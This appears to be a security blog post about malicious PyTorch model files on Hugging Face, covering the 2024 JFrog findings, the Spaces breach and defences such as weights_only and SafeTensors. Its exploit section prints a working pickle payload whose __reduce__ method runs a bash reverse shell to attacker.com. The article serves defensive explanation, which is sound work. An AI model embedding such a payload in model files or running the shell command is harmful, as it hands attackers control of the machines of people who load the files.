
Compromised Models on Hugging Face: Pickle Exploits in the Model Hub

Malicious actors have uploaded model files to Hugging Face containing pickle payloads that execute code the moment the model is loaded. This post covers the 2024 security incidents, how pickle exploitation works in model files, and what the Hugging Face response has meant for the ecosystem.

By Theo Voss · 8 min read

The Hugging Face Hub hosts over one million public model repositories — the largest publicly accessible collection of trained neural network weights in existence. For machine learning practitioners, it’s a dependency as routine as npm or PyPI: you find a model, you pull the weights, you load it in your pipeline. In most cases, this takes about 10 lines of code and five minutes.

What most practitioners don’t fully internalize is that loading a model from the Hub is not like downloading an image or a document. For models stored in PyTorch’s native format, loading the model executes code. And because the Hub is open to community contributions, malicious actors have uploaded models that use this behavior to compromise the machines of users who load them.

The JFrog Discovery: Production-Grade Malware in Model Files

In February 2024, JFrog’s security research team published an analysis of malicious models they had discovered on the Hugging Face Hub. The findings were unambiguous: model files containing pickle payloads that, when loaded, established reverse shell connections to attacker infrastructure.

The models they analyzed looked like ordinary PyTorch checkpoints: the malicious payload was embedded in the pickle-serialized weights and executed the moment the file was loaded.

The attack was silent. The model would load normally from the user’s perspective — no error, no warning, no difference in behavior. In the background, a reverse shell was connecting to attacker infrastructure. The user’s machine, with whatever permissions the Python process had, was now accessible to the attacker.

JFrog identified at least 100 malicious models using this technique at the time of their publication. Hugging Face acknowledged the findings and removed the flagged models, but noted that the fundamental challenge, pickle's code execution property, is not fixable through model scanning alone.

How Pickle Exploitation Works in Model Files

PyTorch’s .pt and .bin files use Python’s pickle serialization. Pickle is a protocol for serializing arbitrary Python objects, and its instruction stream can include references to functions and other callables. A class can define a __reduce__ method that tells pickle to reconstruct the object by calling an arbitrary callable with attacker-chosen arguments; when Python unpickles the file, that call executes.

The minimal exploit is approximately:

import os
import pickle

class Exploit:
    def __reduce__(self):
        # Tells pickle to "reconstruct" this object by calling os.system
        # with a reverse-shell one-liner; a real payload would background
        # the shell so the load appears to complete normally.
        return (os.system, ("bash -i >& /dev/tcp/attacker.com/4444 0>&1",))

# Embed the object in what looks like an ordinary checkpoint dict
payload = pickle.dumps({"model": Exploit()})
# Store this as a .bin file and wrap it in model metadata

When a user calls torch.load("malicious_model.bin"), Python’s pickle machinery invokes __reduce__, which calls os.system with the attacker’s command. The model “loads” — the returned dictionary looks like a normal checkpoint — while the system command executes silently.

The sophistication floor for this attack is low. Building a functional pickle payload for model files requires a few dozen lines of Python and no specialized knowledge. The hard part is distribution — getting users to load the malicious model — and the Hugging Face Hub solves that problem for the attacker.
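
One partial mitigation now ships in PyTorch itself: the weights_only flag on torch.load (available since PyTorch 1.13 and, in recent releases, the default) swaps in a restricted unpickler that only reconstructs tensor-related types. A minimal victim-side sketch, assuming the payload above was saved as malicious_model.bin:

import pickle

import torch

# Legacy behavior: the embedded os.system call fires during load.
# checkpoint = torch.load("malicious_model.bin")  # payload executes

# Restricted unpickler: the reference to os.system is rejected instead
# of invoked, and the load fails with an UnpicklingError.
try:
    checkpoint = torch.load("malicious_model.bin", weights_only=True)
except pickle.UnpicklingError as err:
    print(f"Refused to load untrusted pickle: {err}")

Note that weights_only is an allowlist, not a scanner: it blocks the generic os.system trick, but it narrows the attack surface rather than certifying a file as benign.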

The 2024 Spaces Infrastructure Breach

Separate from the malicious model uploads, Hugging Face disclosed in June 2024 an unauthorized access incident affecting the Spaces platform — Hugging Face’s hosted application environment for ML demos and deployments.

The disclosure stated that Hugging Face detected unauthorized access to the Spaces platform and that secrets stored in Spaces (API keys and credentials held as environment variables) may have been exposed. The company invalidated potentially compromised tokens and notified affected users.

The incident’s full scope was not publicly disclosed, but the combination of the malicious model uploads and the Spaces infrastructure breach in 2024 established Hugging Face as a significant attack surface for the ML supply chain.

What Hugging Face Has Done

Hugging Face has implemented several security measures in response to these incidents:

Malware and pickle scanning. The Hub now runs automated scanning on uploaded model files, including pickle payload detection. Flagged models are quarantined and reviewed. The scanning is ongoing but acknowledged to be incomplete: new payload variants can evade signature-based scanners.

SafeTensors as the recommended format. Hugging Face has invested heavily in promoting SafeTensors adoption. Many model pages now include prominent warnings when only pickle-format versions are available and highlight SafeTensors alternatives where they exist.
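
The safety property is structural: a SafeTensors file is raw tensor bytes plus a JSON header describing shapes and dtypes, with no instruction stream to execute. A minimal round-trip sketch using the safetensors library (tensor names are illustrative):

import torch
from safetensors.torch import load_file, save_file

weights = {
    "linear.weight": torch.randn(4, 4),
    "linear.bias": torch.zeros(4),
}

# Serialization writes raw tensor bytes plus a JSON header; nothing
# executable is stored in the file.
save_file(weights, "model.safetensors")

# Loading parses the header and copies tensor data back out; no pickle
# machinery is involved at any point.
restored = load_file("model.safetensors")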

User warnings on pickle loading. The transformers library now displays warnings when loading models in pickle format from community contributors, prompting users to verify the source and consider SafeTensors alternatives.

Trust indicators. Hugging Face has expanded its verification and trust signals — verified organizations, model cards with explicit security notes, and scanning status badges — to help users assess model safety before loading.

What Users Should Do

Despite these improvements, the risk remains real for anyone loading models from community-contributed repositories:

Default to SafeTensors. If a model offers a SafeTensors version, use it. When using from_pretrained() in transformers, add use_safetensors=True to explicitly request the safe format (a combined example follows these recommendations).

Avoid trust_remote_code=True with unverified models. This flag allows arbitrary Python code in the model repository to execute at load time. It is appropriate only for models from organizations you have verified and trust.

Pin by commit hash. Specify the exact commit revision when loading models in automated pipelines. This prevents an attacker from compromising a repository and swapping in a malicious payload after you’ve reviewed the current version; the sketch below shows this alongside use_safetensors.

Check model card and organization verification. Models from verified organizations (with a blue checkmark on the Hub) have a higher assurance level than anonymous community uploads. This is not a guarantee but raises the bar for compromise.
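
Putting these recommendations together in transformers (the repository ID and commit hash below are placeholders, not a real model):

from transformers import AutoModel

model = AutoModel.from_pretrained(
    "some-org/some-model",                     # placeholder repo ID
    revision="<full-commit-sha-you-audited>",  # pin the exact revision
    use_safetensors=True,                      # refuse to fall back to pickle weights
    trust_remote_code=False,                   # the default; keep it off for unverified repos
)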

For a technical deep-dive into the file format vulnerabilities across PyTorch, ONNX, and SafeTensors, see model file format vulnerabilities: pickle, ONNX, and the SafeTensors migration. Platform-level incident history is covered in Hugging Face security incidents. For a continuously updated index of AI/ML CVEs including deserialization and supply chain vulnerabilities, see mlcves.com. The adversarial ML research underpinning model supply chain attacks is cataloged at adversarialml.dev.

Sources

  1. JFrog Security Research: Malicious ML Models on Hugging Face Hub
  2. Hugging Face Security Disclosure: Unauthorized Access to Spaces Secrets
  3. Hugging Face: Pickle Security and SafeTensors
  4. ReversingLabs: ML Model Threat Research
#hugging-face #pickle #model-hub #supply-chain #code-execution #safetensors #malicious-models #mlsec